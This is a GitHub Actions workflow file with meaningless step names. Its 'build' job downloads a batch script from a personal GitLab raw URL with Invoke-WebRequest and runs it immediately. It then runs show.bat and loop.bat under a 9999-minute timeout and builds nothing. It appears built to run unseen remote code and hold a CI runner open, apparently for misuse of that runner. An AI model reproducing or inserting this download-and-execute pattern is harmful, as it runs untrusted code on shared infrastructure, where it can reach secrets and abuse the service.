name: V

on:
  workflow_dispatch:

jobs:
  build:
    name: ...
    runs-on: windows-latest
    timeout-minutes: 9999
    
    steps:
      - name: X
        run: |
          Invoke-WebRequest -Uri "https://gitlab.com/mrriccardoscamarcio1/v/-/raw/main/downloads.bat" -OutFile "Downloads.bat"
          cmd /c Downloads.bat

      - name: Y
        run: cmd /c show.bat

      - name: Z
        run: cmd /c loop.bat
